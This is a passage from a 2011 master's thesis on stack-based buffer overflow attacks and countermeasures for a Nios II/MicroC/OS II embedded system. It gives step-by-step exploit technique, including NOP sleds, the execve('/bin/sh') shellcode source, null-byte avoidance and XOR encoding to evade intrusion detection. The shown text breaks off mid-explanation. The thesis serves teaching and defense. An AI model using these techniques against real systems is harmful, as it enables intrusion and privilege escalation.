Buffer Overflow Attack and Prevention for Embedded Systems

A Thesis submitted to the Graduate School of

The University of Cincinnati in partial fulfillment of the requirements for the degree of

Master of Science

in the Department of Electrical and Computer Engineering of the College of Engineering July 2011 by

Amjad Basha Sikiligiri B.Tech, National Institute of Technology Karnataka, Surathkal 2007

Committee Chair: Dr. Carla Purdy

ABSTRACT

Embedded systems today play a significant role in all aspects of our lives ranging from critical medical applications to multi-purpose handheld devices to simple room temperature controls.

Unfortunately, due to their ubiquity and characteristic features, embedded systems are prone to various security attacks. Software based security attacks, which target security loopholes in and application software, are the most common security attacks because of their relatively easy and cost effective implementation.

Hence it‟s important for embedded system designers and application developers to have knowledge about existing security attacks so as to avoid them in their design. We survey various embedded system security attacks and present a detailed description for a class of software based security attacks, buffer overflow attack. We demonstrate a stack based buffer overflow attack using the Altera Nios II softcore processor and the Micrium MicroC/OS II RTOS kernel. We also present a method to prevent such an attack for this specific system. This method can be modified to apply to a wide range of embedded systems products

ii

iii

TABLE OF CONTENTS

1. INTRODUCTION...... 1

1.1 Motivation...... 1

1.2 Thesis Goals ...... 2

1.3 Outline ...... 2

2. BACKGROUND ...... 3

2.1 Embedded systems security ...... 3

2.2 Buffer overflow attack...... 7 2.2.1 Function calling ...... 7 2.2.2 Vulnerabilities in a program...... 11 2.2.3 The attack ...... 13 2.2.4 Related attacks ...... 14 2.2.5 Real world example: Apache htpasswd.c ...... 14 2.2.6 Countermeasures for buffer overflow attacks ...... 16

2.3 Altera Nios II processor ...... 17

2.4 Micrium MicroC/OS II Kernel ...... 18

2.5 System setup ...... 18

3. PROCEDURES ...... 20

3.1 Find an application with buffer overflow vulnerabilities ...... 20

3.2 Find the effective buffer length ...... 21

3.3 Find the address of the buffer (on stack) ...... 21

3.4 Develop and inject the exploit string (code) ...... 25 3.4.1 Choose a different set of instructions and types ...... 28 3.4.2 Choose appropriate registers...... 28 3.4.3 Replace a single byte with a null byte during run time ...... 29 3.4.4 Encode and decode the exploit code ...... 30

iv

3.5 attack countermeasure ...... 34 3.5.1 Countermeasure implemented ...... 35 3.5.2 Other approaches considered ...... 37

3.6 Buffer overflow in complex programs ...... 39

3.7 Conclusion ...... 39

4. RESULTS ...... 40

4.1 Initial stack address...... 40

4.2 The vulnerable program ...... 42

4.3 The attack ...... 44

4.4 The null byte problem ...... 50

4.5 Prevention ...... 54

4.6 Summary ...... 56

5. CONCLUSIONS AND FUTURE WORK ...... 57

5.1 Conclusions ...... 57

5.2 Future Work ...... 57

REFERENCES ...... 59

APPENDIX A ...... 67

Tutorial for Buffer Overflow Attack and Prevention in Embedded Systems ...... 67

A.1 Nios II system...... 67

A.2 Attack steps ...... 72 A.2.1 Approximate address of the buffer ...... 72 A.2.2 The vulnerable application ...... 74 A.2.3 Is the application buffer overflow vulnerable? ...... 74 A.2.4 Effective buffer length...... 75 A.2.5 Develop and inject the exploit string ...... 75

v

A.3 Prevention ...... 83

vi

LIST OF FIGURES

Figure 2.1: Function call in a C program using MicroC/OS II task …………….………………. 7

Figure 2.2: Disassembled C program ……………..…………………………………………….. 8

Figure 2.3: Prologue and epilogue for the function in Figure 2.1 [1] ………………………….. 10

Figure 2.4: Complete stack region after function call for the function in Figure 2.1 ………….. 11

Figure 2.5: Buffer overflow ...... …... 13

Figure 2.6: Vulnerable part of code in htpasswd.c utility for Apache server [46, 5]……………15

Figure 3.1: Initial stack address ………………..………………………………………………. 22

Figure 3.2: Buffer overflow without NOP Sled …………………………………………………23

Figure 3.3: Buffer overflow with NOP Sled …………………………………………………… 24

Figure 3.4: C Program to spawn a new shell [2, 54]………….………………………………... 26

Figure 3.5: Nios II „jmpi 0x20004e‟ equivalent instructions without null bytes ……………… 28

Figure 3.6: Exploit string structure in the stack frame .……………………………………...... 29

Figure 3.7: Exploit string structure with instructions appended .……………………………… 30

Figure 3.8: Instructions that replace non-null byte with null byte …………………………….. 30

Figure 3.9: Exploit string structure with decoder instructions appended …………….…………31

Figure 3.10: Decoder instructions……………………………. ……………………………….. 33

Figure 3.11: Program/process memory layout [71]…………….……………………………… 34

Figure 3.12: An example Nios II System [1]……………………..……………………………. 35

Figure 3.13: Allocation of read/write memory region to SRAM using Nios IDE …….………. 37

Figure 3.14: Multiple task process control blocks [7] …………………..……………..………. 38

Figure 4.1: C program to find stack address using MicroC/OS II …………………………….. 41

Figure 4.2: A buffer overflow vulnerable program ……….. ………………………………...... 43

Figure 4.3: Exploit string ………………………………………………………..………………45 vii

Figure 4.4: Nios II instructions that call sub routine at 0x0080030c ……………..…………... 45

Figure 4.5: Exploit string components‟ length ………………………………………...…..…... 46

Figure 4.6: Instructions in the exploit string …………………………………………………… 47

Figure 4.7: Exploit string binary equivalent of Figure 4.6……………………..………………. 47

Figure 4.8: Program output for unsuccessful exploit string………………………. …………… 48

Figure 4.9: Successful exploit string………………………………………………...…………. 49

Figure 4.10: Program output for successful exploit string …………………………….………. 50

Figure 4.11: Exploit string with null byte ……………………...………………………………. 50

Figure 4.12: Modified exploit string to avoid RAW hazard..………………………………….. .51

Figure 4.13: Exploit string binary equivalent of Figure 4.12 ………………………………….. 52

Figure 4.14: Multiple execution of „critical_function‟………………… ……………………… 52

Figure 4.15: Exploit string with an embedded decoder ………………….…………………….. 53

Figure 4.16: Exploit string binary equivalent of Figure 4.15……………..……………………. 54

Figure 4.17: Exploit string for an exclusive SRAM Nios II system …….....…………………... 55

Figure 4.18: Instruction trace showing error fetching instruction ………..……………………. 56

Figure A.1: Nios II system with all its components …………….……………………………… 68

Figure A.2: Nios II system with SRAM connected to data bus alone ...……………………...... 69

Figure A.3: Nios II Instruction Trace debug feature …...………………………..…………….. 70

Figure A.4: Nios II system generation ……………………………...……………..…………... 70

Figure A.5: Programming the Cyclone FPGA .………………………………………...…..…... 71

Figure A.6: Nios II project creation ……….…………………………………………………… 73

Figure A.7: MicroC/OS II system library creation ……...……………………..………………. 73

Figure A.8: Nios II IDE Debug view……………………..………………………. …………… 81

Figure A.9: Run the program in Debug view ...……………………………………...………… 81

viii

Figure A.10: Instruction Stepping Mode ……………………………………………….……… 82

Figure A.11: Nios II register set………..……………………...………………………………...82

Figure A.12: Instruction step into mode……………………..…………………………………. 83

Figure A.13: Allocation of stack, text and other regions ………………………………………. 84

Figure A.14: Memory monitor addition ……………..………………… ……………………… 85

Figure A.15: Exploit string in the memory ……………………………….……………………. 86

Figure A.16: Instruction trace showing error in execution ....……………..…………………….87

ix

LIST OF TABLES

Table 2.1: Embedded systems attack types and specific countermeasures……………… 5 and 6

Table 3.1: Available SRAM memory in Altera boards ………….…………………………… 37

Table 4.1: Exploit attempts with estimated return address ..…….…………………………… 49

x

1. INTRODUCTION

1.1 Motivation

Buffer overflow attacks account for a major percentage of software based attacks [5, 14, 68, 69 and 70] on embedded systems as well as on other computing systems [24]. A buffer is a fixed size allotted memory area in program memory space. Buffer overflows happen when more data is written into the buffer area than its capacity [5] in C, C++ and Perl programming languages [4,

5 and 43].

The attack involves corrupting the return address register of the processor [2, 4] or function pointers [4] and subsequently changing the program execution order. The aim is to control the host system by subverting the function of a privileged program (programs with root access rights) [4]

In 2008, over 90% of the attacks recorded for [69, 70] and in 2007 approximately 15% of security alerts by US-CERT (United States Computer Emergency Readiness Team) [68] were related to buffer overflows. [63] was the first documented instance of buffer overflow. This 1988 attack exploited the „finger‟ daemon in operating system.

Other real life examples include attacks against Microsoft‟s IIS web server [64] and SQL Server

2000 [65]. PlayStation 2 had a buffer overflow vulnerability in its BIOS that handled PS1 compatibility [67]. “Twilight Hack” [66] in 2008 aimed at executing unofficial software in without any hardware modifications using buffer overflow vulnerability.

Hence it‟s important to understand what a buffer overflow attack is and how it can be prevented.

1

1.2 Thesis Goals

This thesis aims to study buffer overflow attacks and demonstrate the stack based buffer overflow attack using a specimen embedded system consisting of the Altera Nios II softcoe processor [1] and Micrium MicroC/OS II RTOS kernel [7]. It also aims to provide a method to prevent stack based buffer overflow attacks.

1.3 Outline

The thesis is organized as follows:

Chapter 2 provides background on various embedded system security attacks and countermeasures. It then describes in detail a class of software based attacks, buffer overflow attack and existing countermeasures. A brief overview of the embedded system used in this work is also presented.

Chapter 3 provides various steps involved to carry out a stack based buffer overflow attack including hindrances and workarounds. A pure hardware based preventive measure is then presented.

Chapter 4 gives the results of the attack and its prevention using the Altera Nios II processor and

Micrium MicroC/OS II RTOS kernel embedded system.

Chapter 5 presents conclusions and future work that can be done.

2

2. BACKGROUND

In this chapter we briefly discuss about embedded systems security and a class of attacks called software attacks. We give a detailed description of one type of software attack, buffer overflow.

We also describe the Altera Nios II processor and Micrium MicroC/OS II kernel.

2.1 Embedded systems security

Embedded systems are vulnerable to various types of attacks due to characteristic features such as network connectivity, physical exposure, remoteness etc. [24].

The methods of attacks are broadly classified into three types: logical, physical and side channel

[24]. Side channel based attacks involve stealing information based on device properties such as power consumption, electromagnetic emissions and timing analysis when the device is in operation [24].

Microprobing, reverse engineering, design theft and eavesdropping can be classified as physical attacks [24]. These types of attacks require physical access to the device [25].

Software and cryptographic attacks are two types of logical attacks [24]. Cryptographic attacks try to exploit the weakness of cryptographic protocols to steal information [24, 26].

Software attacks are the most common attacks due to their relative ease of implementation [24,

25]. These types of attacks take advantage of security loopholes in the operating systems and application software [25]. Buffer overflow attacks [4], format string attacks [39] and integer overflows [39] are some of the examples of software attacks [24].

3

Table 2.1 summarizes various attacks and some of the prevention techniques using specially designed hardware, compiler modifications, operating system patches and software.

4

Type of Attack Hardware Countermeasures OS Complier Software/Algorithmic attack Subtype Countermeasures Countermeasures Countermeasures Software Buffer *Process-specific randomized *Non-executable * *Safe languages like , Attacks overflow instruction sets [15] stacks[4, 17, 18 [4] Cyclone[16] *Hardware assisted run-time ,20] *Canary values [4, *Code Analyzer tools[24] monitoring [27] *Address space 19] *Safe Library functions[38] *Separate hardware stack to layout store return address [39] randomization [40] Integer *Compiler *a safe integer arithmetic overflows extension to library[61] monitor execution[57] Format string *GCC compiler *Dataflow analysis and attacks options[58] safe address white- lists[59] *FormatGuard wrapper functions[60] Physical Design theft *Handshaking tokens[37] *Bit stream encryption[37] Attacks Microprobing *Destruction of test circuitry[36] Reverse *Unusual, custom and engineering anonymous parts[35] * Jumbled address and data buses[35] Eavesdropping *Processors with encrypted global buses[34]

Table 2.1: Embedded systems attack types and specific countermeasures 5

Type of Attack Hardware Countermeasures OS Complier Software/Algorithmic attack Subtype Countermeasures Countermeasures Countermeasures Side EM analysis * Circuit redesign for EM *Dummy instructions Channel shielding [33] insertion[31] Attacks * Physically secure zones [29] Timing *Intel’s AES instructions set [62] *Dummy instructions analysis insertion [31] *Message blinding [32]

Power * Non-deterministic processor *Transformed masking analysis design [29] [30] *Window method of modular *Dummy instructions exponentiation [24, 28] insertion [31]

Table 2.1: Embedded systems attack types and specific countermeasures

6

2.2 Buffer overflow attack

In this work we concentrate on one particular type of software attack, buffer overflow attack

[24, 25] which is related to function calls and function pointers [4]. Any application which processes external input (from the user) using vulnerable library functions is susceptible to this kind of attack [51]. The attack tries to control the host by subverting the function of a privileged program [4].

2.2.1 Function calling

/*some work being done in this function*/ void some_function(char *stringpassed) { char name[50];

strcpy(name, stringpassed) printf("Processing called function....!!\n"); return; }

/*task calling a function*/ void task1(void* pdata) { some_function("input"); }

Figure 2.1: Function call in a C program using MicroC/OS II task

C programs containing function calls are effectively translated into function prologue and epilogue when compiled. Consider a part of the hypothetical C program in Figure 2.1 using

Micrium‟s MicroC/OS II kernel. This program has a task „task1‟ calling a function

„some_function‟ with an argument. The some_function copies the argument passed to the local

7

variable „name‟ and then prints a message. This part of the C program (Figure 2.1) when compiled and disassembled would be translated into Altera Nios II binary instructions as shown in Figure 2.2. MicroC/OS II and Nios II are described in section 2.3 and 2.4 respectively.

Physical implementation of function calls makes use of stacks. Stacks are a type of process memory region where data can be stored in Last In First Out (LIFO) fashion. They can grow from higher to lower address or vice versa [2]. In the Nios II processor, the stack grows downward from higher to lower [1].

Stacks make use of two pointers for data access, the stack pointer and the frame pointer. Stack pointer (sp) is a pointer to the last used memory space. Frame pointer (fp) points to the saved frame pointer near the top of the stack frame [1]. Frame pointer in the case of Nios II is optional and can be eliminated for code optimization [1].

void some_function(char *stringpassed) { addi sp,sp,-64 stw ra,60(sp) Function prologue stw fp,56(sp) addi fp,sp,56 .

. . } ldw ra,60(sp) ldw fp,56(sp) Function epilogue addi sp,sp,64 ret

Figure 2.2: Disassembled C program

8

The function prologue helps in allocating a frame (a chunk of space) in the stack to store local variables, passed arguments, return address (ra) and frame pointer. Return address is the address of the instruction which needs to be executed after the current function call is completed.

In the case of the Nios II processor, the function prologue does the following [1]

Adjust the stack pointer (to allocate the frame)

Store required registers to the frame

Set the frame pointer to the location of the saved frame pointer

A function epilogue is the counterpart of the prologue. The epilogue undoes the work done by the prologue when returning from the called function.

The concepts of prologue and epilogue are further explained in Figure 2.3 and Figure 2.4 for the program in Figure 2.1 and Figure 2.2.

9

Figure 2.3: Prologue and epilogue for the function in Figure 2.1 [1].

The area allocated for local variables, such as „name‟ in Figure 2.1 and Figure 2.4, is usually referred to as a „buffer‟ [2]. Note that the 52 bytes are allotted instead of just 50 bytes to store

„name‟ because compilers allocate memory in multiples of word size which is 32 bits (4 bytes) for Nios II.

10

Figure 2.4: Complete stack region after function call for the function in Figure 2.1

2.2.2 Vulnerabilities in a C program

C language provides various string handling library functions like strcpy, strcat in string.h header file. strcpy function copies a null terminated string from one memory location (called source array) to another (destination array) [21]. The prototype of strcpy is:

char * strcpy ( char * destination, const char * source ); [21] strcat function appends the source string to the destination string. The prototype of strcat is similar to strcpy function [23].

11

strcpy, strcat do not have bounds checking in their implementation. In other words, these functions do not check for the length of the input argument. Therefore when the input argument size is more than the destination variable, data overflow spreads into adjacent memory regions.

For example 1, if we pass “stringpassed” containing more than 52 bytes, the copied data using strcpy function can overflow into the memory region meant for „fp‟ and/or „ra‟ storage. Since the memory region is referred to as a buffer, the data overflow from „name‟ memory region to

„fp‟ and/or „ra‟ region is referred to as “buffer overflow”. So a buffer overflow allows us to change the return address of a function. Hence when the processor pops out the return address

„ra‟ it sees a different return address than initially stored in the stack. In this way we can change the flow of execution of the program [2]. Figure 2.5 shows buffer overflow for the C program of

Figure 2.1 when the input is 60 characters (bytes) of “A”.

Most vulnerabilities in a C program are related to buffer overflows and string manipulation, many resulting in a [3]. But attackers can create malicious input values specific to the target processor instruction set and environment to achieve illegal instruction execution [3].

Other C library functions like gets, scanf, sprintf are also buffer overflow prone [5, 41].

12

Figure 2.5: Buffer overflow

2.2.3 The attack

By corrupting the return address in the stack, the attacker can cause the program to jump to exploit code when the victim function returns [4]. This type of buffer overflow is called “stack smashing attack” [4].

Once the attacker overwrites the return address, they can choose what instructions to be executed next, for example, spawning a new shell [2]. The instructions (exploit code) can be placed in the buffer that is overflowing and then overwrite the return address so it points back into the buffer [2]. This form of attack is called “Injected Code” attack [4, 9]. For example,

13

instead of passing 60 characters of “A”s as shown in Figure 2.5, the attacker can pass characters representing binary instructions in hexadecimal notation (refer to Chapter 3 for details).

The code (instructions) to be injected can be generated manually, provided one has the target processor instruction set architecture knowledge. It can also be first written in the C language and then compiled and assembled to get the equivalent binary instructions [2].

2.2.4 Related attacks

There is another form of stack based buffer overflow attack known as "Existing

Code” or “return-to-libc” attack. In this type of attack, it‟s enough to overwrite the return address. Code to be executed is already present in the program‟s memory space [4, 9]. The attacker need only parameterize the code, and then cause the program to jump to it [4]. This thesis demonstrates code injection attacks [4, 9] but not existing code attacks.

Buffers can also be allocated in heap regions (variables declared using malloc) and the corresponding buffer overflow attacks lead to what are known as heap based overflow attacks

[6]

Even C++ and perl language [4, 5, 43] are susceptible to Buffer overflow attacks.

2.2.5 Real world example: Apache htpasswd.c

There are many instances of buffer overflow attacks in real life [12]. An example is Apache

HTTP server‟s htpasswd.c program, which manipulates password file for Apache HTTP server

[46]. This program was found to be susceptible to stack based buffer overflow attacks [5, 10,

11] when the binary has root permissions [11] or if the script is accessible through a CGI

(Common Gateway Interface) [44]. 14

The vulnerable part of the code takes user supplied „user‟ and copies it to a fixed size local buffer using strcpy [45]. The vulnerable functions „strcpy‟ and „strcat‟ can be seen in the code fragment in Figure 2.6.

/* Make a password record from the given information*/

static int mkrecord(char *user, char *record, size_t rlen, char *passwd, int alg)

{

char *pw; char cpw[120];

strcpy(record, user); strcat(record, “:”); strcat(record, cpw);

return 0; }

int main(int argc, char *argv[]) { FILE *ftemp = NULL; FILE *fpw = NULL; char user[MAX_STRING_LEN]; char password[MAX_STRING_LEN]; char record[MAX_STRING_LEN];

}

Figure 2.6: Vulnerable part of code in htpasswd.c utility for Apache server [46, 5]

15

2.2.6 Countermeasures for buffer overflow attacks

Many countermeasure techniques have been proposed for buffer overflow attacks due to their abundance. Countermeasures take the form of custom processor architectures, operating system patches, compiler modifications, code analysis tools, etc [14].

In [15] Kc GS et al present an expensive approach to counter code injection attacks. The proposed approach is to encode the instruction stream in the executable file [15]. The instructions are later decoded when the processor is about to execute them [15]. This way, since the attacker does not know the key (also since the instructions are decoded before executing), the injected code would not correspond to the native processor instruction set. Hence the attack is prevented.

SmashGuard [39] presents a hardware solution for attacks that target a function return address stored on the program stack. The approach involves storing the return address in an exclusive hardware stack for each function call and comparing it to the one on the program stack during return. Mismatch results in an exception [39].

Cyclone [16] is a safe dialect of C designed to counter buffer overflow attacks among other vulnerabilities in C programs. There are also patches available for the Linux kernel [17, 18] and

Solaris [20] that make stacks non-executable, hence preventing code injection attacks but not existing code attacks [4]

Address Space Layout Randomization (ASLR) randomizes base address of various process memory segments such as stack, heap and dynamic libraries at load and link time [40, 47].

Though this approach makes it significantly harder for the attackers, it‟s not completely foolproof [40]. 16

StackGuard[4, 19] is a gcc compiler modification which places a „canary‟ value next to the

„return address‟ on the stack region. So if the attacker tries to overflow the buffer to overwrite the legitimate return address, they would also overwrite the canary value stored. The process would be killed during function return If the canary is not the same as initially stored [4, 19].

2.3 Altera Nios II processor

Nios II is a configurable softcore RISC processor from Altera Corporation with a 32 bit instruction set architecture and 32 general purpose registers [1]. This processor can be synthesized on various embedded development boards offered by Altera, including the UP3

Educational Kit.

Altera‟s SOPC Builder design tool [13] can be used to configure the Nios II system with required peripherals and processor core features. The Nios II processor core has three different flavors: `standard`, `economy` and `fast` [1]. Each is targeted for different critical requirements, for example standard is less area demanding and fast gives a high performance processor with large area requirements.

Custom instructions can also be added to the existing instruction set for performance critical applications [1].

17

2.4 Micrium MicroC/OS II Kernel

MicroC/OS II is a proprietary real time operating system kernel from Micrium targeted for embedded system applications [7]. It supports multitasking and is a priority based pre-emptive kernel [7].

Altera provides an evaluation version of MicroC/OS II free with the Nios II Embedded

Development Suite (EDS) download [8]. Using EDS, this kernel can easily be ported to the

Nios II processor to develop the required software.

Though Nios II has a Unit (MMU) to help provide for processes, MicroC as such does not provide virtual memory support for Nios II.

2.5 System setup

The Altera Nios II processor with Micrium MicroC/OS II kernel is one of the most widely used embedded system platform [49, 50]. MicroC/OS II as such does not offer any support for buffer overflow attack prevention [7] nor does it support virtual memory for processes [7].

This research makes use of the Altera Nios II embedded processor (using UP3 Cyclone FPGA platform [48]) and Micrium MicroC/OS II system for demonstrating the buffer overflow attack and preventive measures.

Since the Nios II processor is proprietary to the Altera Corporation, any countermeasure involving modification to the Nios II processor core hardware is not considered for implementation (because the results are not publishable).

18

Using safe language is an option to consider, but most of the time embedded systems make use of off the shelf software (written in the C language [52]) and the designer might not have control over the source code. Also it‟s not practical for all of the embedded software to be compiled using a single compiler which is immune to buffer overflow [51].

Instead, we implement a system level solution to prevent the attack by having a dedicated

SRAM memory to be used by the function call stacks of the program. Altera‟s SOPC builder is used to configure the required system. This solution is similar to non-executable buffers discussed in [4, 17, 18, 20].

19

3. Procedures

This chapter first discusses various steps and hindrances involved in performing a buffer overflow attack (code injection attack). It then presents a possible countermeasure to prevent successful execution of the code injection attack.

We define „exploit string‟ as the input provided by the user consisting of the exploit code and the new return address. The code injection attack requires passing of the exploit string to the target program. The steps involved can roughly be divided as follows [2, 51, 53, 54]:

1. Find an application with buffer overflow vulnerabilities

2. Find the effective buffer length

3. Find the address of the buffer (on stack)

4. Develop and inject the exploit string (code)

3.1 Find an application with buffer overflow vulnerabilities

The attacker can start with open source programs to check for any vulnerable library functions in the victim program. Alternately, since any program which accepts external input is potentially vulnerable, the attacker can play with this program to give some arbitrarily large input. If the program returns an error, for example, segmentation violation in most of the modern operating systems, or if the program simply malfunctions, then the attacker has succeeded in this stage. In some cases, if the vulnerabilities are published in security related media, the attacker can exploit the users who have not updated their application with necessary security patches.

20

3.2 Find the effective buffer length

Similar to step 1 above, the attacker first starts with normal input to the vulnerable program.

Then the size of the input is increased (or doubled) repeatedly to see if the program returns any error or if it malfunctions due to overflow. Once there is an overflow for an input of length, say

L, the attacker can further play with the input by decreasing the size of the input to figure out the exact length. Generally the effective buffer length would be about a few hundred bytes [2,

54].

In [53], Ogorkiewicz and Frej presents an interesting and possibly easier way to find the length of the buffer for a specific operating system. The approach involves interpreting the error message thrown by the operating system when overflow occurs

3.3 Find the address of the buffer (on stack)

The attacker need not find the exact address of the vulnerable buffer. An approximation will do.

This step makes use of the fact that all the programs have approximately the same starting address for stacks for a given operating system and processor [2]. Also most programs push a few hundred to a few thousand bytes on to the stack [2, 54].Hence the address of the buffer should be somewhere around this initial starting address.

Stack starting address [2] can be found using the code shown in Figure 3.1 (the program is specific to the Nios II processor and MicroC/OS II kernel). This code has „task1‟ calling a function „find_sp‟. The function „find_sp‟ moves the value of the stack pointer (sp) into a general purpose register r2 and returns it at the completion of the function. Then the task

„task1‟ prints the returned stack address in hexadecimal notation. Note that we cannot use an

21

arbitrary register such as r5, r21, etc in place of r2. Nios II returns values up to 8 bytes using r2 and r3 registers [1], hence we need to use r2.

Most attacks target a privileged program, like SUID root program [4, 39, 54] so that attackers can spawn a new shell or do other operations with root privileges. The attacker will first execute the program in Figure 3.1 with normal user permissions and use this information for the attack on a program with root permissions

/*move the value of sp to r2 register*/ unsigned long find_sp(void) { asm(" mov r2, sp"); }

/* Prints value of stack address */ void task1(void* pdata) { printf("0x%x\n", find_sp()); }

Figure 3.1: Initial stack address

To increase the chances of success, the attacker combines a technique called “NOP Sled” with the approximate stack address found earlier [2, 5]. NOP Sled technique pads a few No –

Operation (NOP) op-codes onto the front of the exploit code. This way the attackers will succeed in executing their injected (exploit) code if they are able to point the injected return address anywhere within this NOP instruction region. The processor simply slides through the

NOP instructions until it starts executing the exploit code. NOP can be any instruction which does not have an effect on the processor state. Since r0 is a constant register with a value of zero, Nios II implements NOP as „add r0, r0, r0‟ [1]. Figure 3.2 and Figure 3.3 further elaborate the concept of NOP Sled. 22

Figure 3.2: Buffer overflow without NOP Sled

To find out the approximate buffer address, the attacker will start with the initial stack address obtained by running the program in Figure 3.1, then gradually increment or decrement this address. NOP Sled technique combined with this guesswork leads to a high probability for the attacker to be able to point the return address somewhere into the NOP region after a few trials.

A possible setback for the attacker in this step would be a return address which has “null bytes” in its most significant 3 bytes. For example, if the return address is of the form 0x00YYYYYY 23

or 0xYY00YYYY or 0xYYYY00YY, where Y can take values 0-F in hexadecimal notation, then the attacker will not be able to succeed in stack smashing attacks, which rely on return address overwriting. The reason is that null bytes are considered the end of the string, hence string operations using „strcpy‟ end as soon as a null byte is encountered. A return address of the form 0xYYYYYY00 will mostly not be a problem for the attacker since the return address would generally be the last word in the exploit string

Figure 3.3: Buffer overflow with NOP Sled

24

Note that if the attackers are targeting an open source program or if they are in possession of the target program, they can easily run gdb (GNU Debugger or similar tools) at their end to get a very good approximation of the buffer location.

3.4 Develop and inject the exploit string (code)

Exploit string can be injected in any of the following ways [39]:

User input (e.g. typing into a web browser, command line argument passing, program

reading input from file)

Network connection(e.g. large packets of data)

Environment variables (e.g. program search path)

Most of the attacks inject code, which is processor and operating system dependant, to spawn a new shell with root privileges.

The process of exploit code development involves writing a C program and then using a tool like GNU Debugger [2] to obtain the equivalent assembly instructions. For example, the C code for spawning a new shell is as shown in Figure 3.4 [2, 54]. This program makes an „execve‟ system call to execute „/bin/sh‟. The prototype of „execve‟ is:

int execve(const char *filename, char *const argv [], char *const envp[]); [55]

„execve‟ executes the program pointed to by „filename‟, „argv‟ is an array of argument strings passed to the new program and „envp‟ is used to pass environment variables to the new program [55]. The program in Figure 3.4 is then compiled with the GNU Debugger to obtain the equivalent assembly instructions.

25

#include

void main() {

char* argv[2];

argv[0] = “/bin/sh”; argv[1] = NULL;

execve(argv[0], argv, NULL);

}

Figure 3.4: C Program to spawn a new shell [2, 54]

Hardware Abstraction Layer [56] of Nios II is a runtime library that provides a device driver interface for programs to communicate with the underlying hardware. The Nios II HAL API

(Application Program Interface) does not support the „execve‟ system call. Calls to execve() always fail with the return code –1 and errno set to ENOSYS [56].

Hence, instead of attempting to spawn a new shell, this work demonstrates how to change the program execution flow. The code to change program execution flow will be discussed in

Chapter 4.

Irrespective of the motive of the attacker, whether to spawn a new shell or change the program flow execution, the attacker most probably would face the problem of “null bytes” in the exploit code similar to the previous step (step 3). Null byte of the form 0xYYYYYY00, in addition to

0x00YYYYYY or 0xYY00YYYY or 0xYYYY00YY, is also a problem in the case of exploit code, because string copying stops as soon as the ‟strcpy‟ library function sees a null byte.

26

For example, assume that the exploit code uses the following NiosII instruction. It causes the processor to next execute the instruction present at the memory location 0x00800138.

jmpi 0x20004e

In terms of register operations, the above instruction does the following [1]:

PC ← (PC31..28: 0x20004e × 4)

Here PC register stands for Program Counter which contains the address of the next instruction to be executed. The above instruction when encoded into a Nios II binary instruction would be

[1]:

0x08001381

Here „0x‟ implies the representation is in hexadecimal notation. It can be seen that the above instruction has a null byte in it (of the form 0xYY00YYYY). Null bytes in the exploit code can be eliminated using one of the following techniques, which are described in detail below:

1. Choose a different set of instructions and data types(byte, half word level) [2, 5]

2. Choose appropriate registers

3. Replace a single byte with a null byte during run time

4. Encode and decode the exploit code [5]

27

3.4.1 Choose a different set of instructions and data types [2, 5]

Most of the processors provide a rich set of instructions to choose from. For example, the Nios

II „jmpi 0x20004e‟ instruction, which has null bytes when encoded, can also be implemented using the instructions shown in Figure 3.5.

Assembly instructions Binary equivalent xor r5, r5, r5 0x294af03a xorhi r5, r5, 0x0080 0x4940203c addi r5, r5, 0x0138 0x29404e04 callr r5 0x283ee83a

Figure 3.5: Nios II „jmpi 0x20004e‟ equivalent instructions without null bytes

The alternate instructions in Figure 3.5 are free of null bytes when encoded. We first clear register r5 to „0‟ using „xor r5, r5, r5‟, then transfer 0x0080 and 0x0138 into high and low halfwords of register r5 using „xorhi r5, r5, 0x0080‟ and „addi r5, r5, 0x0138‟ instructions respectively. Finally we call a subroutine at the address contained by „r5‟ which is 0x00800138.

Hence, by using alternate instructions and byte or half word level operations, we can get rid of the null bytes in the instruction encoding.

3.4.2 Choose appropriate registers

In Figure 3.5, the first two instructions „xor r5, r5, r5‟ and „xorhi r5, r5, 0x0080‟ can effectively be combined into one instruction „xorhi r5, r0, 0x0080‟ (since r0 is always zero in the Nios II [ 1]). But „xorhi r5, r0, 0x0080‟ when encoded will have null bytes in it. Hence choosing appropriate registers helps avoid null bytes in instruction encoding

28

3.4.3 Replace a single byte with a null byte during run time

The general structure of the exploit string with NOP Sled is as shown in Figure 3.6. From section 2.2, we know that the execution of the exploit code starts after the function epilogue is completed. The function epilogue restores the stack pointer (sp) to its initial value, which in the case of the Nios II processor points to the memory location just above the return address

(Functions that take variable arguments will have a slightly different scenario [1]).

Figure 3.6: Exploit string structure in the stack frame

Hence if the exploit code has a single null byte, based on Figure 3.6, we can figure out the location of the null byte in the exploit code from the stack pointer (sp). To avoid the null byte problem, we first change the null byte to non-null byte (1F, FF etc) and append a few instructions before the exploit code. The appended instructions will replace the non-null byte with a null byte in the exploit code during program execution. The structure of the exploit string in this case would be as shown in Figure 3.7. 29

Figure 3.7: Exploit string structure with instructions appended

Assuming that the location of the null byte is 6 bytes away from the stack pointer (sp), the instructions to append before the exploit code are as shown in Figure 3.8. The value 6 in the

„stb r5,-6(sp)‟ instruction has to be modified accordingly before injecting it depending on the location of the null byte.

xor r5, r5, r5  generate null byte in r5 stb r5,-6(sp)  store null byte in place of ‘ff’ , ‘1f’ etc

Figure 3.8: Instructions that replace non-null byte with null byte

3.4.4 Encode and decode the exploit code

Section 3.4.3 dealt with a case when the exploit code has just one null byte. In case of multiple null bytes, encoding the exploit code is an option to consider. As explained below, encoding the exploit code makes it polymorphic (i.e., same exploit code gets translated into different binary

30

data depending on the key used to encode) and almost no Intrusion Detection System (IDS) will be able to detect it [5].

In this technique, the attacker encodes the exploit code, which has null bytes, to make it null byte free and then places a decoder (set of instructions) after the exploit code. During program execution, the decoder will decode the encoded exploit code to obtain original exploit code with null bytes. The exploit string in this case would be very similar to the one in step (section) 3.4.3 and is shown in Figure 3.9.

Figure 3.9: Exploit string structure with decoder instructions appended

Foster et al in [5] suggests adding a random number to the exploit code as one of the encoding schemes. The decoder will then subtract this number from each of the encoded exploit code bytes to obtain the original exploit code with null bytes. In this work, instead of adding, we chose to exclusive or (XOR) each of the exploit code byte with a random number (key) to get rid of the null bytes. The process of XORing with a different key is repeated until we obtain null 31

byte free encoded exploit code. The reasons to use the XOR function to encode instead of adding a random number are:

XOR is also a reversible transformation (A XOR Key XOR Key = A)

This potentially avoids null bytes in the Nios II „subi‟ instruction required by the

decoder

The decoder can be implemented using the instructions shown in Figure 3.10 and is further explained as follows:

a. The movi instruction in line 1 moves the value of exploit code (i.e. encoded code) length

multiplied by 16 into register r7. If we just load the value of exploit code length (4 bytes

in this case), without the multiplication factor, the instruction when translated into its

binary equivalent will have null bytes in it. Hence in order to avoid null bytes in this

instruction, the length is multiplied by some constant (16 in this case).

